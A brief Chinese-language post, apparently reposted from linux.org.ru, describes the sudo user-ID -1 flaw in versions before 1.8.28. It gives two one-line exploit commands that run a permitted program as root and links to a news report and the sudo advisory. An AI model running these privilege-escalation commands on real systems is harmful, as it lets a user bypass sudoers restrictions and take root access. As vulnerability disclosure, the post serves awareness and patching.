sudo 中的一個錯誤允許您以 root 身分執行任何可執行檔案(如果 /etc/sudoers 允許其他使用者執行該檔案並且禁止 root 執行)。
該錯誤的利用非常簡單:
sudo -u#-1 id -u
或者:
sudo -u#4294967295 id -u
該錯誤存在於 1.8.28 之前的所有 sudo 版本中
聯繫方式:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
來源: linux.org.ru